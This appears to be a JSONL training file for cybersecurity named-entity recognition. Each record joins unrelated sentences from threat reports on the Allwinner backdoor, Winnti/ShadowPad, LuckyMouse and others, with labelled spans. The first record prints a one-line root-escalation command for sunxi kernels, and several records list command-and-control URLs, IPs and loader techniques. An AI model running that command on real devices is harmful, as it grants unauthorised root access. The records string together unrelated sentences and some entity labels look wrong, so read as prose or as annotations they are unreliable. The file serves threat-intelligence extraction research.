{"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) . Outlaw : http://www.minpop.com/sk12pack/idents.php Command and control . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": [{"start": 142, "end": 154, "label": "Indicator"}, {"start": 194, "end": 209, "label": "Indicator"}, {"start": 256, "end": 263, "label": "System"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 294, "end": 297, "label": "System"}, {"start": 342, "end": 347, "label": "System"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 392, "end": 411, "label": "System"}, {"start": 414, "end": 423, "label": "System"}, {"start": 662, "end": 668, "label": "Organization"}, {"start": 671, "end": 712, "label": "Indicator"}, {"start": 713, "end": 732, "label": "System"}]}
{"text": "At the forum of the Armbian operating system , a moderator who goes by the name Tkaiser noted that the backdoor code could remotely be exploitable \" if combined with networked services that might allow access to /proc . In 2016 , CTU researchers observed the group using native system . Outlaw : http://www.minpop.com/sk12pack/names.php Command and control . \u201c Who or what is asdfdfsda@asdf.com ? , \u201d Biderman asked , after being sent a list of nine email addresses .", "spans": [{"start": 20, "end": 27, "label": "System"}, {"start": 212, "end": 217, "label": "Indicator"}, {"start": 230, "end": 233, "label": "Organization"}, {"start": 287, "end": 293, "label": "Organization"}, {"start": 296, "end": 336, "label": "Indicator"}, {"start": 337, "end": 356, "label": "System"}, {"start": 376, "end": 394, "label": "Organization"}, {"start": 401, "end": 409, "label": "Organization"}]}
{"text": "'' This security hole is currently present in every operating system image for A83T , H3 or H8 devices that rely on kernel 3.4 , he added . In March 2018 we detected an ongoing campaign . Winnti Group targeting universities in Hong Kong . Once a system was exploited a unique downloader was dropped onto the victim \u2019s disk , containing a customized micro backdoor written in Assembler .", "spans": [{"start": 79, "end": 83, "label": "System"}, {"start": 86, "end": 88, "label": "System"}, {"start": 92, "end": 94, "label": "System"}, {"start": 116, "end": 126, "label": "System"}, {"start": 188, "end": 200, "label": "Organization"}, {"start": 375, "end": 384, "label": "System"}]}
{"text": "This blunder made by the company has been frustrating to many developers . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . In November 2019 , we discovered a new campaign run by the Winnti Group against two Hong Kong universities . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": [{"start": 261, "end": 273, "label": "Organization"}, {"start": 328, "end": 340, "label": "Malware"}, {"start": 437, "end": 443, "label": "Organization"}]}
{"text": "Allwinner has also been less transparent about the backdoor code . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . We found a new variant of the ShadowPad backdoor , the group \u2019s flagship backdoor , deployed using a new launcher and embedding numerous modules . This convinced the user it was safe to download files once logged in .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 250, "end": 268, "label": "Malware"}, {"start": 293, "end": 301, "label": "Malware"}]}
{"text": "David Manouchehri released the information about the backdoor through its own Github account ( Pastebin ) and then apparently deleted it . we detected an ongoing campaign targeting a national data center . The Winnti malware was also found at these universities a few weeks prior to ShadowPad . In addition , individuals like Hack520 prove that these threat actors are composed of varied individuals who have their own set of expertise .", "spans": [{"start": 78, "end": 84, "label": "Organization"}, {"start": 95, "end": 103, "label": "Organization"}, {"start": 206, "end": 224, "label": "Malware"}, {"start": 283, "end": 292, "label": "Malware"}, {"start": 326, "end": 333, "label": "Organization"}]}
{"text": "Mobile Malware Evolution : 2013 24 FEB 2014 The mobile malware sector is growing rapidly both technologically and structurally . The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) . The Winnti Group , active since at least 2012 , is responsible for for high-profile supply-chain attacks against the video game and software industries leading to the distribution of trojanized software ( such as CCleaner , ASUS LiveUpdate and multiple video games ) that is then used to compromise more victims . Method , where the code checks one of two values before running encryption logic", "spans": [{"start": 152, "end": 167, "label": "System"}, {"start": 227, "end": 230, "label": "System"}, {"start": 239, "end": 251, "label": "Organization"}, {"start": 418, "end": 437, "label": "Malware"}, {"start": 448, "end": 456, "label": "System"}, {"start": 459, "end": 474, "label": "System"}, {"start": 549, "end": 629, "label": "Indicator"}]}
{"text": "It is safe to say that today \u2019 s cybercriminal is no longer a lone hacker but part of a serious business operation . we detected an ongoing campaign targeting a national data center in the Centeral Asia . It is also known for having compromised various targets in the healthcare and education sectors . The attackers first attempted to use the LockBit ransomware but when that was blocked , they resorted to 3AM instead .", "spans": [{"start": 307, "end": 316, "label": "Organization"}, {"start": 344, "end": 362, "label": "Malware"}, {"start": 408, "end": 411, "label": "Malware"}]}
{"text": "There are various types of actors involved in the mobile malware industry : virus writers , testers , interface designers of both the malicious apps and the web pages they are distributed from , owners of the partner programs that spread the malware , and mobile botnet owners . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors . ESET researchers recently published a white paper updating our understanding of the arsenal of the Winnti Group , following a blog post documenting a supply-chain attack targeting the videogame industry in Asia . Two examples are Windows Sysinternals SDelete and Active@ Killdisk .", "spans": [{"start": 326, "end": 341, "label": "System"}, {"start": 405, "end": 409, "label": "Organization"}, {"start": 504, "end": 516, "label": "Organization"}, {"start": 635, "end": 655, "label": "System"}, {"start": 656, "end": 663, "label": "System"}, {"start": 668, "end": 684, "label": "System"}]}
{"text": "This division of labor among the cybercriminals can also be seen in the behavior of their Trojans . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) . Additionally , we published a blog post on a new backdoor named skip-2.0 that targets Microsoft SQL Server . This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": [{"start": 161, "end": 171, "label": "Organization"}, {"start": 211, "end": 224, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 303, "end": 311, "label": "Malware"}, {"start": 325, "end": 345, "label": "System"}, {"start": 384, "end": 392, "label": "Organization"}, {"start": 403, "end": 428, "label": "Organization"}]}
{"text": "In 2013 , there was evidence of cooperation ( most probably on a commercial basis ) between different groups of virus writers . It's possible TG-3390 used a waterhole to infect data center employees . This article focuses on the technical details of this new ShadowPad variant . Protecting your information and systems from every vantage point , including your networks , devices , applications , transmissions , privileges , and storage is critical , as is regularly training your staff on the latest cyber threats , trends , and ransomware phishing attacks .", "spans": [{"start": 142, "end": 149, "label": "Organization"}, {"start": 177, "end": 198, "label": "Organization"}, {"start": 259, "end": 268, "label": "Malware"}]}
{"text": "For example , the botnet Trojan-SMS.AndroidOS.Opfake.a , in addition to its own activity , also spread Backdoor.AndroidOS.Obad.a by sending spam containing a link to the malware to the victim \u2019 s list of contacts . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack . About the \u201c Winnti Group \u201d naming : After gaining access to a victim network , UNC2452 has a light malware footprint , often using legitimate credentials to access data and move laterally .", "spans": [{"start": 25, "end": 54, "label": "Malware"}, {"start": 103, "end": 128, "label": "Malware"}, {"start": 280, "end": 294, "label": "Vulnerability"}, {"start": 297, "end": 329, "label": "System"}, {"start": 468, "end": 480, "label": "Organization"}, {"start": 535, "end": 542, "label": "Organization"}, {"start": 547, "end": 643, "label": "Organization"}]}
{"text": "It is now clear that a distinct industry has developed and is becoming more focused on extracting profits , which is clearly evident from the functionality of the malware . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests . We have chosen to keep the name \u201c Winnti Group \u201d since it \u2019s the name first used to identify it , in 2013 , by Kaspersky . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": [{"start": 189, "end": 195, "label": "System"}, {"start": 316, "end": 328, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 591, "end": 616, "label": "System"}, {"start": 622, "end": 635, "label": "System"}]}
{"text": "2013 in figures A total of 143,211 new modifications of malicious programs targeting mobile devices were detected in all of 2013 ( as of January 1 , 2014 ) . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . Since Winnti is also a malware family , we always write \u201c Winnti Group \u201d when we refer to the malefactors behind the attacks . TIEDYE has similarities to RABBITHUNT , which is a backdoor written in C++ that communicates via a custom binary protocol over TCP .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 229, "end": 237, "label": "System"}, {"start": 245, "end": 254, "label": "System"}, {"start": 263, "end": 269, "label": "Malware"}, {"start": 315, "end": 327, "label": "Organization"}, {"start": 384, "end": 390, "label": "Malware"}, {"start": 411, "end": 421, "label": "Malware"}, {"start": 433, "end": 514, "label": "Malware"}]}
{"text": "In 2013 , 3,905,502 installation packages were used by cybercriminals to distribute mobile malware . There were traces of HyperBro in the infected data center from mid-November 2017 . Since 2013 , it has been demonstrated that Winnti is only one of the many malware families used by the Winnti Group . Once the initial export is called ( in this case , the legitimately named function IETrackingProtectionEnabled ) , the downloader will copy itself and call regsvr32.exe with parameters \u201c /u /s \u201d to automatically call the function for unregistering COM servers DllUnregisterServer .", "spans": [{"start": 122, "end": 130, "label": "System"}, {"start": 227, "end": 233, "label": "Malware"}, {"start": 287, "end": 299, "label": "Organization"}, {"start": 453, "end": 531, "label": "Indicator"}, {"start": 550, "end": 581, "label": "System"}]}
{"text": "Overall in 2012-2013 we detected approximately 10,000,000 unique malicious installation packages : Different installation packages can install programs with the same functionality that differ only in terms of the malicious app interface and , for instance , the content of the text messages it spreads . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . In November 2019 , ESET \u2019s machine-learning engine , Augur , detected a malicious and unique sample present on multiple computers belonging to two Hong Kong universities where the Winnti malware had already been found at the end of October . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": [{"start": 320, "end": 329, "label": "Organization"}, {"start": 375, "end": 383, "label": "System"}, {"start": 391, "end": 400, "label": "System"}, {"start": 422, "end": 426, "label": "Organization"}, {"start": 456, "end": 461, "label": "System"}, {"start": 583, "end": 589, "label": "Malware"}, {"start": 690, "end": 712, "label": "Organization"}, {"start": 743, "end": 757, "label": "Organization"}]}
{"text": "Android remains a prime target for malicious attacks . This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology . The suspicious sample detected by Augur is actually a new 32-bit ShadowPad launcher . The malware then checks the command execution functionality using a command that vary across the samples .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 150, "end": 159, "label": "Organization"}, {"start": 162, "end": 168, "label": "Organization"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 220, "end": 225, "label": "System"}, {"start": 251, "end": 260, "label": "Malware"}, {"start": 272, "end": 283, "label": "Malware"}, {"start": 289, "end": 376, "label": "Malware"}]}
{"text": "98.05 % of all malware detected in 2013 targeted this platform , confirming both the popularity of this mobile OS and the vulnerability of its architecture . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups . Samples from both ShadowPad and Winnti found at these universities contain campaign identifiers and C&C URLs with the names of the universities , which indicates a targeted attack . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": [{"start": 217, "end": 222, "label": "System"}, {"start": 230, "end": 241, "label": "System"}, {"start": 244, "end": 247, "label": "System"}, {"start": 373, "end": 382, "label": "Malware"}, {"start": 387, "end": 393, "label": "Malware"}, {"start": 455, "end": 458, "label": "System"}, {"start": 545, "end": 552, "label": "Organization"}]}
{"text": "Most mobile malware is designed to steal users \u2019 money , including SMS-Trojans , and lots of backdoors and Trojans . Emissary Panda has used many ways with the most notable being the exploits from the Hacking Team leak . In addition to the two compromised universities , thanks to the C&C URL format used by the attackers we have reasons to think that at least three additional Hong Kong universities may have been compromised using these same ShadowPad and Winnti variants . Further , NIST does not endorse any commercial products that may be mentioned on these sites .", "spans": [{"start": 285, "end": 288, "label": "System"}, {"start": 444, "end": 453, "label": "Malware"}, {"start": 458, "end": 464, "label": "Malware"}, {"start": 486, "end": 490, "label": "Organization"}]}
{"text": "Over the year , the number of mobile malware modifications designed for phishing , the theft of credit card information and money increased by a factor of 19.7 . Emissary Panda is still active and continues to target selected organisations . This campaign of the Winnti Group against Hong Kong universities was taking place in the context of Hong Kong facing civic protests that started in June 2019 triggered by an extradition bill . For example , the report shows that the US shouldered a hefty 43 percent of all global attacks and that ransomware attacks in France nearly doubled in the last five months .", "spans": [{"start": 263, "end": 275, "label": "Organization"}, {"start": 539, "end": 557, "label": "Organization"}]}
{"text": "In 2013 , Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks . Even though the bill was withdrawn in October 2019 , protests continued , demanding full democracy and investigation of the Hong Kong police . STRATOFEAR contains an embedded configuration that includes two file paths .", "spans": [{"start": 10, "end": 23, "label": "Organization"}, {"start": 88, "end": 101, "label": "Organization"}, {"start": 415, "end": 425, "label": "Malware"}, {"start": 426, "end": 489, "label": "Malware"}]}
{"text": "Methods and techniques 2013 not only saw a radical increase in output from mobile virus writers but also saw them actively applying methods and technologies that allowed cybercriminals to use their malware more effectively . The campaign is believed to be active covertly since fall 2017 . These protests gathered hundreds of thousands of people in the streets with large support from students of Hong Kong universities , leading to multiple university campus occupations by the protesters . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON \u201d or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": [{"start": 492, "end": 498, "label": "System"}, {"start": 508, "end": 517, "label": "System"}]}
{"text": "There were several distinct areas where mobile malware underwent advances . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year . We have contacted the compromised universities and provided the necessary information and assistance to remediate the compromise . Additional attacker backdoors identified on systems with names that masquaraded as legitimate binaries and also produced AOT files upon translation ( e.g. , npx - cli and npx-cli.aot ) .", "spans": [{"start": 76, "end": 86, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 116, "end": 129, "label": "Organization"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 143, "end": 160, "label": "Organization"}, {"start": 245, "end": 267, "label": "System"}, {"start": 428, "end": 446, "label": "Organization"}, {"start": 447, "end": 564, "label": "Indicator"}]}
{"text": "Distribution Cybercriminals made use of some exceptionally sophisticated methods to infect mobile devices . March by security researchers from Kaspersky Labs . Unlike previous ShadowPad variants documented in our white paper on the arsenal of the Winnti Group , this launcher is not obfuscated using VMProtect . Victims of the campaign , which researchers named Out to Sea PDF , include diplomatic organizations , technology companies , and medical organizations in Israel , Tunisia , and the UAE .", "spans": [{"start": 143, "end": 157, "label": "Organization"}, {"start": 176, "end": 185, "label": "Malware"}, {"start": 247, "end": 259, "label": "Organization"}, {"start": 300, "end": 309, "label": "System"}, {"start": 327, "end": 335, "label": "Organization"}, {"start": 362, "end": 376, "label": "Organization"}, {"start": 387, "end": 411, "label": "Organization"}, {"start": 414, "end": 434, "label": "Organization"}, {"start": 441, "end": 462, "label": "Organization"}]}
{"text": "Infecting legal web resources help spread mobile malware via popular websites . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network . Furthermore , the encrypted payload is neither embedded in the overlay nor located in a COM1:NULL.dat alternate data stream . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": [{"start": 113, "end": 116, "label": "Organization"}, {"start": 407, "end": 413, "label": "System"}]}
{"text": "More and more smartphone and tablet owners use their devices to access websites , unaware that even the most reputable resources can be hacked . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors . And the usual RC5 encryption with a key derived from the volume ID of the system drive of the victim machine ( as seen in the PortReuse backdoor , skip-2.0 and some ShadowPad variants ) is not present either . They will frequently compromise a system to then place the hidden service on that particular system .", "spans": [{"start": 331, "end": 350, "label": "Organization"}, {"start": 479, "end": 497, "label": "Malware"}, {"start": 500, "end": 508, "label": "Malware"}, {"start": 518, "end": 527, "label": "Malware"}]}
{"text": "According to our data , 0.4 % of the websites visited by users of our products were compromised sites . attacks to a Chinese-speaking threat actor group called LuckyMouse . In this case , the launcher is much simpler . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": [{"start": 230, "end": 242, "label": "Malware"}, {"start": 282, "end": 379, "label": "Malware"}, {"start": 390, "end": 408, "label": "Organization"}, {"start": 413, "end": 443, "label": "Organization"}]}
{"text": "Distribution via alternative app stores . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The launcher is a 32-bit DLL named hpqhvsei.dll , which is the name of a legitimate DLL loaded by hpqhvind.exe . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware \u2013 a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": [{"start": 90, "end": 120, "label": "Vulnerability"}, {"start": 123, "end": 137, "label": "Vulnerability"}, {"start": 167, "end": 170, "label": "System"}, {"start": 177, "end": 189, "label": "Indicator"}, {"start": 226, "end": 229, "label": "System"}, {"start": 240, "end": 252, "label": "Indicator"}, {"start": 312, "end": 324, "label": "Organization"}, {"start": 334, "end": 340, "label": "Organization"}, {"start": 407, "end": 416, "label": "Organization"}, {"start": 531, "end": 589, "label": "Organization"}]}
{"text": "In Asia there are numerous companies producing Android-based devices and Android apps , and many of them offer users their own app stores containing programs that can not be found in Google Play . This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This executable is from HP and is usually installed with their printing and scanning software called \u201c HP Digital Imaging \u201d . So , instead of wasting time trying to figure out what is going on , I debugged the script using the browser .", "spans": [{"start": 47, "end": 60, "label": "System"}, {"start": 73, "end": 80, "label": "System"}, {"start": 183, "end": 194, "label": "System"}, {"start": 417, "end": 419, "label": "Organization"}, {"start": 496, "end": 514, "label": "System"}, {"start": 616, "end": 627, "label": "System"}]}
{"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center . In this case the legitimate hpqhvind.exe was dropped by the attackers , along with their malicious hpqhvsei.dll , in C:\\Windows\\Temp . KillNet has remained relatively consistent in its targeting of Ukraine \u2019s supporters and prioritization of DDoS attacks since Russia invaded in February 2022 , and despite new capabilities , the collective has hardly altered its targeting patterns .", "spans": [{"start": 272, "end": 282, "label": "Organization"}, {"start": 376, "end": 385, "label": "Organization"}, {"start": 444, "end": 456, "label": "Indicator"}, {"start": 515, "end": 527, "label": "Indicator"}, {"start": 658, "end": 670, "label": "Organization"}]}
{"text": "Distribution via botnets . According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks . Although we do not have the component that dropped and executed this launcher , the presence of these files leads us to think that the initial execution of this launcher is done through DLL side-l S-TOOLoading . Monitor MSSQL Servers with access to OT systems and networks for evidence of : \u2022 Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": [{"start": 87, "end": 102, "label": "System"}, {"start": 403, "end": 426, "label": "System"}, {"start": 510, "end": 582, "label": "Indicator"}]}
{"text": "As a rule , bots self-proliferate by sending out text messages with a malicious link to addresses in the victim \u2019 s address book . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) . When the malicious DLL is loaded at hpqhvind.exe startup , its DLLMain function is called that will check its parent process for the following sequence of bytes at offset 0x10BA . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": [{"start": 182, "end": 190, "label": "System"}, {"start": 195, "end": 215, "label": "System"}, {"start": 218, "end": 221, "label": "System"}, {"start": 245, "end": 248, "label": "System"}, {"start": 262, "end": 274, "label": "Indicator"}]}
{"text": "We also registered one episode of mobile malware spreading via a third-party botnet . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 . In the case where the parent process is hpqhvind.exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory . Sometimes this was a high profile , legitimate site such as \u2018 diplomacy.pl \u2019 hosting a ZIP archive .", "spans": [{"start": 230, "end": 238, "label": "System"}, {"start": 338, "end": 350, "label": "Indicator"}, {"start": 428, "end": 431, "label": "System"}]}
{"text": "Resistance to anti-malware protection The ability of malicious software to operate continuously on the victim \u2019 s mobile device is an important aspect of its development . the targets of the hacking group were in the automotive . It replaces the original instructions at 0x10BA with an unconditional jump ( jmp \u2013 0xE9 ) to the address of the function from hpqhvsei.dll that decrypts and executes the encrypted payload embedded in the launcher . In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": [{"start": 217, "end": 227, "label": "Organization"}, {"start": 356, "end": 368, "label": "Indicator"}, {"start": 453, "end": 458, "label": "Organization"}, {"start": 473, "end": 481, "label": "Malware"}]}
{"text": "The longer a Trojan \u201c lives \u201d on a smartphone , the more money it will make for the owner . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data . The decompiled function responsible for patching the parent process . In fact , they often drive one another to complete more complicated hacks .", "spans": [{"start": 92, "end": 108, "label": "Organization"}, {"start": 149, "end": 159, "label": "Organization"}]}
{"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups . In case hpqhvsei.dll is loaded by a different process than hpqhvind.exe , the malicious code will not be decrypted and executed . Indicators of Attack are different from Indicators of Compromise IoC , the latter describing evidence of compromised network security .", "spans": [{"start": 180, "end": 199, "label": "Organization"}, {"start": 202, "end": 210, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 230, "end": 239, "label": "Organization"}, {"start": 246, "end": 269, "label": "Organization"}, {"start": 315, "end": 337, "label": "Organization"}, {"start": 348, "end": 360, "label": "Indicator"}, {"start": 399, "end": 411, "label": "Indicator"}, {"start": 470, "end": 490, "label": "Indicator"}, {"start": 510, "end": 538, "label": "Indicator"}]}
{"text": "Criminals are increasingly using obfuscation , the deliberate act of creating complex code to make it difficult to analyze . LAS VEGAS\u2014Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . The difference between the original and patched hpqhvind.exe . Paired with KillNet \u2019s reported compromise and leak of North Atlantic Treaty Organization ( NATO ) documents , this sudden increase in capability could indicate significant investment from more sophisticated actors , particularly when measured against KillNet \u2019s capabilities since the collective \u2019s inception in late 2021 .", "spans": [{"start": 192, "end": 208, "label": "Organization"}, {"start": 418, "end": 430, "label": "Indicator"}]}
{"text": "The more complex the obfuscation , the longer it will take an antivirus solution to neutralize the malicious code . Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack . The part of the code that is patched is located at the very beginning of the main function of hpqhvind.exe . Once a system was exploited a unique downloader was dropped onto the victim \u2019s disk , containing a customized micro backdoor written in Assembler .", "spans": [{"start": 130, "end": 147, "label": "Organization"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 531, "end": 543, "label": "Indicator"}, {"start": 682, "end": 691, "label": "System"}]}
{"text": "Tellingly , current virus writers have mastered commercial obfuscators . the United Kingdom had data stolen by members of Emissary Panda . The patched code is located right after the load of hpqhvsei.dll . Additionally , the IP address 198.244.135[.]250 is being utilized for another C2 domain prontoposer[.]com while still having a PTR record to the domain previously identified .", "spans": [{"start": 122, "end": 136, "label": "Organization"}, {"start": 191, "end": 203, "label": "Indicator"}, {"start": 225, "end": 253, "label": "System"}, {"start": 284, "end": 311, "label": "System"}]}
{"text": "This implies they have made considerable investments . the US had data stolen by members of Emissary Panda . This means that the function responsible for decrypting and executing the payload is executed directly after the load of the malicious DLL . LIGHTWORK utilizes positional command line arguments for target device , port , and IEC-104 command .", "spans": [{"start": 92, "end": 106, "label": "Organization"}, {"start": 244, "end": 247, "label": "System"}, {"start": 250, "end": 259, "label": "System"}, {"start": 334, "end": 341, "label": "System"}]}
{"text": "For example , one commercial obfuscator , which cost \u20ac350 , was used for Trojans and Opfak.bo Obad.a Android vulnerabilities are used by criminals for three reasons : to bypass the code integrity check when installing an application ( vulnerability Master Key ) ; to enhance the rights of malicious applications , considerably extending their capabilities ; and to make it more difficult to remove malware . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The encrypted payload is located in the .rdata section of hpqhvsei.dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration . WithSecure has identified instances where the malware was delivered to victims through LinkedIn .", "spans": [{"start": 85, "end": 100, "label": "Malware"}, {"start": 411, "end": 435, "label": "Vulnerability"}, {"start": 532, "end": 545, "label": "Vulnerability"}, {"start": 593, "end": 606, "label": "Vulnerability"}, {"start": 639, "end": 656, "label": "Organization"}, {"start": 738, "end": 750, "label": "Indicator"}, {"start": 844, "end": 854, "label": "Organization"}, {"start": 890, "end": 897, "label": "Malware"}, {"start": 931, "end": 939, "label": "System"}]}
{"text": "For example , Svpeng uses a previously unknown vulnerability to protect itself from being removed manually or by the antivirus program . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese . The decrypted payload is the usual shellcode responsible for ShadowPad initialization ( obfuscated using fake conditional jumps to hinder disassembly ) . The threat of Iranian cyber operations continues to rise as challenges in relation to the renewal of the 2015 Iranian Nuclear Deal persist and regional tensions , specifically between Israel and Iran , escalate .", "spans": [{"start": 14, "end": 20, "label": "Malware"}, {"start": 355, "end": 364, "label": "System"}, {"start": 381, "end": 390, "label": "Malware"}, {"start": 488, "end": 512, "label": "Organization"}, {"start": 584, "end": 604, "label": "Organization"}, {"start": 658, "end": 664, "label": "Organization"}, {"start": 669, "end": 673, "label": "Organization"}]}
{"text": "Cybercriminals also exploit the Master Key vulnerability and have learned to embed unsigned executable files in Android installation packages . If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC . After having been decrypted , ShadowPad \u2019s shellcode is executed . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor \u2019s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as \u2018 one of the world \u2019s most unusual APT operations \u2019 due to : \u2022 Its use of a customized backdoor written in Assembler using \u2018 old school \u2019 virus writing techniques and habits \u2022 Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": [{"start": 32, "end": 56, "label": "Vulnerability"}, {"start": 112, "end": 119, "label": "System"}, {"start": 349, "end": 358, "label": "Malware"}, {"start": 362, "end": 371, "label": "System"}, {"start": 458, "end": 463, "label": "Organization"}, {"start": 478, "end": 486, "label": "Malware"}, {"start": 489, "end": 499, "label": "Malware"}, {"start": 517, "end": 539, "label": "Organization"}, {"start": 542, "end": 562, "label": "Organization"}, {"start": 565, "end": 617, "label": "Organization"}]}
{"text": "Digital signature verification can be bypassed by giving the malicious file exactly the same name as a legitimate file and placing it on the same level in the archive . Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address . It will first achieve persistence on the system by writing the in-memory patched parent process to disk to a path specified in the configuration string pool . ThreatConnect Can Help Protect Your Organization from Phishing and BEC Attacks", "spans": [{"start": 475, "end": 488, "label": "Organization"}]}
{"text": "The system verifies the signature of the legitimate file while installing the malicious file . There has also been at least one victim targeted by a spear-phishing attack . In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR.exe . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": [{"start": 212, "end": 242, "label": "Indicator"}]}
{"text": "Unfortunately , there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups . It then creates a service named clr_optimization_v4.0.30229_32 , which is responsible for executing CLR.exe . The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": [{"start": 213, "end": 223, "label": "System"}, {"start": 378, "end": 385, "label": "Indicator"}, {"start": 402, "end": 411, "label": "System"}, {"start": 433, "end": 663, "label": "Indicator"}]}
